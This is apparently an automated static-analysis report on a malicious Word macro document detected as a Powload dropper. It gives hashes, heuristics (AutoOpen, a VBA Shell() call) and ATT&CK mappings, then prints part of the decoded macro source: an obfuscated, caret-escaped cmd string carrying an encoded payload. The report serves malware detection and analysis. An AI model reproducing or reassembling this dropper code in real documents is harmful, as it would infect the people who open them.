Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 5e1f4107b44b3818…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 83.6 KB
Created: 2018-08-29 15:14:00
Authoring application: Microsoft Office Word
First seen: 2018-10-07
MD5: 1eb44e3443876bad0809088b734e53b2
SHA-1: 801d129f82ba13b1a64635cca798bd86bfc23c94
SHA-256: 5e1f4107b44b38183b61d8add19e9e5e9c74261c20f8cfafdafcfdbccfacb9da
Risk score: 202

Malware Insights

MITRE ATT&CK: T1059.005 (Command and Scripting Interpreter: Visual Basic), T1204.002 (User Execution: Malicious File)

The sample is a malicious Office document containing VBA macros. A critical heuristic fired on a Shell() call within the VBA code; Shell() executes an arbitrary command line from the macro, which is the typical hand-off from a lure document to a second-stage payload. The ClamAV detection name 'Doc.Dropper.Powload-6666836-0' further indicates dropper functionality, most likely a PowerShell-based download-and-execute stage.

Heuristics (6)

  • ClamAV: Doc.Dropper.Powload-6666836-0 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Dropper.Powload-6666836-0
  • VBA macros detected (medium, OLE_VBA_MACROS; 2 related findings)
    Document contains VBA macro code
  • Shell() call in VBA (critical, OLE_VBA_SHELL)
    Shell() call in VBA
  • AutoOpen macro (high, OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL (info, EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (channel: in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 9905 bytes
SHA-256: 7944d4030b5acf5ab97b1c82dd636f929f969cb7d13b86931784772d09fb3ecc

Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "HqZXCzBjYUosNZ"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "hzhBlkt"
Function pZbRcqTzqDt()

On _
Error _
Resume _
Next
Hour KZplB * azmRaW / 4736 / SphwNh
   Hour 3081 / Fnhwp * 98538 * ZTvtWc
   Hour 79248 * cPOEr
zZpcjWqV = "md " + "/" + "V^:^ON/" + "C" + Chr(0 + 2 + 0 + 3 + 29) + "^" + "s^e^"
Hour 74518 * KZjHiq
   Hour 17765 * kzUlk
   Hour 9867 / GaIEpS / RtwLU * oEuSf
   Hour 60726 / iJhAQ
SLpVhn = "t ^f" + "^M=A" + "^AC" + "^" + "A"
Hour IdZUH * qlsio
   Hour tZTEZE * RWErQ / 60856 * FKzAs
   Hour pEENZ * LLiwKc
itOQwVNTt = "^" + "g^A^AI^" + "AAC" + "A^g^A^" + "AI^A" + "^" + "ACA^g" + "A^A^I" + "^AAC^" + "A^gA" + "AI^A^AC" + "A"
Hour 85309 * ZhEbwk
   Hour dwURzI * uHLwNJ
   Hour 37370 * ouUvG
   Hour 91834 * sKRsb / MaYrr / lOtlY
wICXBF = "gAA^IA^" + "ACAg" + "^AQ^" + "fA^0" + "H^A^7^" + "BA^aA^" + "M^G^A" + "0" + "B^Q^Y^" + "AMGA9B" + "^"
Hour duOjnC * 32315 / 59202 * OcrioR
   Hour 56526 / JrKGpv / dUwbXZ * coziM
EajOXIHVVFO = "wO^A" + "s" + "G^AhBQZ" + "AI" + "HAi^B" + "w^O" + "^" + "A^4^G" + "A1^B" + "g^e^" + "A^QC^Ag"
pZbRcqTzqDt = zZpcjWqV + SLpVhn + itOQwVNTt + wICXBF + EajOXIHVVFO
   Hour tZwii * jvfLYK * wdtoN * fYcZX
   Hour VzXIUT / PWimG
   Hour 87949 / Ttfiw / LONrj * tdQzaD
   Hour 33882 * Hkohs / OZrHH * HsHfww
End Function
Function juFKY()

On _
Error _
Resume _
Next
Hour 17892 * ksUlF * 65696 * 21906
   Hour XWrFwz / vHiOcK * iuoiE / 18889
bQiAWDnz = "A" + "Qb" + "^" + "A^U^G" + "A0^B" + "Q^S^A0C"
Hour OFHMbM * NwjUM
   Hour 31768 / vXndAb / SGIVzj / hFmVA
   Hour 23607 / cZhtz / hRfQYP / FKcBl
   Hour LHLid * RCJOv
YjdTi = "Al^B^" + "wa^A" + "^" + "8G" + "A^2^" + "B^" + "g" + "bAk" + "^EA^7AQ" + "K"
Hour XwaOfb * bvJOHM / jMJZwB * wuWCNV
   Hour zamWu * LvsRpz
   Hour 55050 / 15880 / 75326 * TPfHQ
   Hour wiPTUn * aWjocW
GzYfmH = "^A4GA" + "^1^B^" + "geA^Q" + "CAg^AA^" + "L^"
Hour 16018 / SOPvC
   Hour YEDMR / Yowbz / rEDlms * 15928
McZZSccJzOB = "A8^" + "GA^p^Bg" + "T^A^QCA" + "o^AQ^" + "Z^A^w" + "^GAp^B^" + "g"
Hour 19232 * 28750
   Hour 82833 * LYPOZ
   Hour ijBJz / OLuUXv
pXIhAQmc = "R^" + "AQ^G^" + "Ah^Bwb" + "A^w" + "GA^u^"
Hour 55671 / aUaiQF / 30301 * 40812
   Hour 12269 / pzWDRh * 9900 / nPcqi
   Hour NWvQBS / nhMsd * BitVjw * hfrtU
CYDlvsGprlD = "B" + "wd^A" + "8^G" + "A^E^" + "B^" + "gL^" + "AQ^FA^" + "a^BQ"
Hour 43604 * JiqjQ
   Hour 45023 * jhBQW / 39003 / 67252
   Hour 70768 / zirNQ / vjwVop / 82198
   Hour iZEXjj / PNhiB / 92218 * 510
   Hour IYTwSw / BiAIm / 9131 * aNPzZ
EBKkn = "VAQ" + "CA^7B" + "^Q^e^A" + "^I^HA0B" + "weA^kC" + "^AB^B^w"
Hour 85177 / qkKia
   Hour 88045 * 66826
   Hour 81990 * YIZsR
   Hour CtXjwS / zcNNH
aiIiaPwJjF = "V^A^Q^" + "E^AkAA" + "I^A" + "4G^" + "A" + "^p^BAIA" + "8^G^" + "Ap^B^" + "g^TAQ"
Hour 35779 / MBJhF / Nfiiq / KikSn
   Hour pBFJI * rvZmD * RCjSf * lJjVJ
   Hour lUBbWv / YOhoH / OrZCUu / hwNmjR
   Hour oFVbGN * ifiUs / 14935 / oCqlsj
DZXBVvP = "C^" + "A" + "^oA^A^a" + "^AMG^Ah" + "^" + "B^Q^" + "ZA" + "I^H"
Hour 89824 / 62643 / oHATAZ / qObHTm
ObcwPbsjjq = "^AvB" + "^" + "gZAsD" + "^AnA^QZ" + "A^g^H^A" + "^lB^g" + "^L^A" + "cCAr" + "^A"
juFKY = bQiAWDnz + YjdTi + GzYfmH + McZZSccJzOB + pXIhAQmc + CYDlvsGprlD + EBKkn + aiIiaPwJjF + DZXBVvP + ObcwPbsjjq
   Hour oGOsF / 49793
   Hour ZLQiX / 74257
   Hour 44610 * fNadbj
   Hour 57259 * lzzdvq
End Function
Function wUdRSqs()

On _
Error _
Resume _
Next
Hour LffJBd / zjNzk / 69488 * wojtq
   Hour UizXBO / itLnkp / dlAEB / dUQLsH
FpAcmiRcsJ = "g^dAU^F" + "AzB" + "AJ^AsCA" + "nA^A^" + "X"
Hour fdjLD / CnGRzM * bbwRW * UFAcjK
   Hour afjUSz * mfujM
CzThirVjkzE = "AcC^ArA" + "^wYA^k^" + "GAs^B" + "^g" + "Y^A" + "^U^H^Aw" + "Bg^" + "OAY^H^" + "A^u^" + "B" + "Q^Z^" + "A^QC^A"
Hour 95436 * DAXwiJ
DEWvjoYWn = "9" + "A^g" + "^bA" + "^UH^" + "A6^BA"
Hour ERpmYP / 
... (truncated)